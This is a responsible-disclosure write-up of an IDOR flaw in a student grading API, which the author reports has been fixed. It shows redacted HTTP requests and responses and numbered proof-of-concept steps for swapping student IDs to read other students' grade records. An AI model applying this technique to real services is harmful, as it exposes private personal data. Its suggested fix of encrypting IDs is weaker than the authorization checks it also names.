IDOR in 'stuno' parameter leading to unauthorized data exposure

Preface: the proper personnel have been notified of this vulnerability and it has since been fixed.

akili

~3 min read · December 23, 2025 (Updated: December 23, 2025) · Free: Yes

Write-up Executive Summary

This vulnerability is an Insecure Direct Object Reference in the 'stuno' parameter of an API call that retrieves grading information. Modifying a GET request to the API endpoint with an ID value equal to another students ID returned the full grading history of that other student. No authorization checks were made. The risk of this vulnerability is elevated due to fact that student IDs are readily publicly available (within the student population).

For an attacker, potentially automating these GET requests to mass collect sensitive student information would be easy.

Vulnerability Details

Understanding how the web page retrieves the grading information is pretty simple–two JSON GET requests are made.

For privacy reasons, the URLs has been redacted. In addition, all IDs, numbers, and program descriptions below have been modified from their original value:

1st Request:

GET /redacted/redacted/redacted?stuno=0123456789 HTTP/1.1
Host: redacted
Cookie: redacted
Sec-Ch-Ua-Platform: "macOS"
Authorization: redacted
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/plain, */*
Sec-Ch-Ua: "Chromium";v="143", "Not A(Brand";v="24"
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: redacted
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

Response:

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 93
Connection: keep-alive
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Expires: 0
X-Powered-By: Express
Access-Control-Allow-Origin: redacted
Access-Control-Allow-Methods: redacted
Access-Control-Allow-Headers: redacted
Via: redacted

[
  {
    "degreeProgramCode":"1234",
    "degreeProgramDescription":"Communications"
  }
]

The response gives us a degreeProgramCode value– this value is then passed into the parameter for the second GET request that actually retrieves the student grading information.

2nd Request:

GET /redacted/redacted/redacted?stuno=0123456789&dprog=1234 HTTP/1.1
Host: redacted
Cookie: redacted
Sec-Ch-Ua-Platform: "macOS"
Authorization: redacted
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/plain, */*
Sec-Ch-Ua: "Chromium";v="143", "Not A(Brand";v="24"
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: redacted
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

Response:

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 34723
Connection: keep-alive
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Expires: 0
X-Powered-By: Express
Access-Control-Allow-Origin: redacted
Access-Control-Allow-Methods: redacted
Access-Control-Allow-Headers: redacted
Cache-Control: no-store, no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Expires: 0
Surrogate-Control: no-store
Via: 1.1 redacted

[
  {
    "darout":"PREPARED: xx/xx/25 - xx:xx"
  },
  {
    "darout":"PROGRAM: 1234 CATALOG YEAR: 20231"
  },
  {
    "darout":"DEGREE PROGRESS REPORT"
  .
  .
  .
  .
]

The 2nd response is cut short due to space and privacy reasons, but this response returns all grading data.

Proof of Concept

All someone needs to do to replicate this vulnerability:

Intercept both GET requests.
Modify the 'stuno' parameter within the first GET request to equal the ID of another student.

Example with a student ID of 9876543210:

GET /redacted/redacted/redacted?stuno=9876543210

3. Record the value for the 'degreeProgramCode' in the response

4. Modify the 'stuno' parameter with the other student's ID and the 'dprog' parameter with the newly returned 'degreeProgramCode' value.

GET /redacted/redacted/redacted?stuno=9876543210&dprog=4321

5. Record the response

Remediation and Fixes

A quick fix to this IDOR vulnerability would be to encrypt the student IDs being passed as parameter values so no one can replicate another students. Another comprehensive solution would be to secure the API endpoint by putting authorization checks in place and not allowing users to call the API endpoint with another individuals ID.